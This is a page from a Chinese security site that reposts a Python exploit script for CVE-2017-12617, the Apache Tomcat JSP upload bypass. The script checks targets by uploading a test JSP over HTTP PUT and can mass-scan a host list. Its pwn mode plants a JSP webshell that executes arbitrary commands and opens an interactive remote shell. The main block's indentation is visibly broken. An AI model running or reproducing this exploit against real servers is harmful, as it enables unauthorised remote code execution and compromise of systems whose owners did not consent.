首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass
来源:@intx0x80 作者:intx0x80 发布时间:2017-10-10  
#!/usr/bin/python
import requests
import re
import signal
from optparse import OptionParser
 
 
 
 
 
 
 
 
class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
 
 
 
 
banner="""
 
 
   _______      ________    ___   ___  __ ______     __ ___   __ __ ______
  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
 | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / /
 | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / / 
 | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /  
  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/   
                                                                           
                                                                           
 
[@intx0x80]
 
"""
 
 
 
 
 
def signal_handler(signal, frame):
 
    print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
 
    exit()
 
signal.signal(signal.SIGINT, signal_handler)
 
 
 
 
def removetags(tags):
  remove = re.compile('<.*?>')
  txt = re.sub(remove, '\n', tags)
  return txt.replace("\n\n\n","\n")
 
 
def getContent(url,f):
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
    re=requests.get(str(url)+"/"+str(f), headers=headers)
    return re.content
 
def createPayload(url,f):
    evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
    req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
    if req.status_code==201:
        print "File Created .."
 
   
def RCE(url,f):
    EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
    <INPUT name='cmd' type=text>
    <INPUT type=submit value='Run'>
    </FORM>
    <%@ page import="java.io.*" %>
    <%
   String cmd = request.getParameter("cmd");
   String output = "";
   if(cmd != null) {
      String s = null;
      try {
         Process p = Runtime.getRuntime().exec(cmd,null,null);
         BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) { output += s+"</br>"; }
      }  catch(IOException e) {   e.printStackTrace();   }
   }
%>
<pre><%=output %></pre>"""
 
 
    
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
    
    req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)
    
 
 
def shell(url,f):
    
    while True:
        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
        cmd=raw_input("$ ")
        payload={'cmd':cmd}
        if cmd=="q" or cmd=="Q":
                break
        
        re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
        re=str(re.content)
        t=removetags(re)
        print t
 
 
 
 
 
#print bcolors.HEADER+ banner+bcolors.ENDC
 
parse=OptionParser(
 
 
bcolors.HEADER+"""
 
 
   _______      ________    ___   ___  __ ______     __ ___   __ __ ______
  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
 | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / /
 | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / / 
 | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /  
  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/   
                                                                           
                                                                           
 
 
./cve-2017-12617.py [options]
 
options:
 
-u ,--url [::] check target url if it's vulnerable
-p,--pwn  [::] generate webshell and upload it
-l,--list [::] hosts list
 
[+]usage:
 
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt
 
 
[@intx0x80]
 
"""+bcolors.ENDC
 
    )
 
 
parse.add_option("-u","--url",dest="U",type="string",help="Website Url")         
parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
 
(opt,args)=parse.parse_args()
 
if opt.U==None and opt.P==None and opt.L==None:
    print(parse.usage)
    exit(0)
 
 
 
else:
    if opt.U!=None and opt.P==None and opt.L==None:
        print bcolors.OKGREEN+banner+bcolors.ENDC
        url=str(opt.U)
        checker="Poc.jsp"
        print bcolors.BOLD +"Poc Filename  {}".format(checker)
        createPayload(str(url)+"/",checker)
        con=getContent(str(url)+"/",checker)
        if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
            print bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC
        print bcolors.WARNING+url+"/"+checker+bcolors.ENDC
        
    else:
            print 'Not Vulnerable to CVE-2017-12617 '
    elif opt.P!=None and opt.U!=None and  opt.L==None:
                print bcolors.OKGREEN+banner+bcolors.ENDC
        pwn=str(opt.P)
        url=str(opt.U)
        print "Uploading Webshell ....."
        pwn=pwn+".jsp"
        RCE(str(url)+"/",pwn)
        shell(str(url),pwn)
    elif opt.L!=None and opt.P==None and opt.U==None:
                print bcolors.OKGREEN+banner+bcolors.ENDC
        w=str(opt.L)
        f=open(w,"r")
        print "Scaning hosts in {}".format(w)
        checker="Poc.jsp"
        for i in f.readlines():
            i=i.strip("\n")
            createPayload(str(i)+"/",checker)
            con=getContent(str(i)+"/",checker)
            if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
                print str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m"
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·OrientDB 2.2.2 - 2.2.22 - Remo
·ERS Data System 1.8.1 Java Des
·Rancher Server - Docker Daemon
·PyroBatchFTP 3.17 - Buffer Ove
·WebKit JSC - 'BytecodeGenerato
·ClipBucket 2.8.3 - Remote Code
·DiskBoss Enterprise 8.4.16 - L
·Dnsmasq < 2.78 - Integer Under
·Dnsmasq < 2.78 - Lack of free(
·Dnsmasq < 2.78 - Information L
·Dnsmasq < 2.78 - Stack-Based O
·Dnsmasq < 2.78 - Heap-Based Ov
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved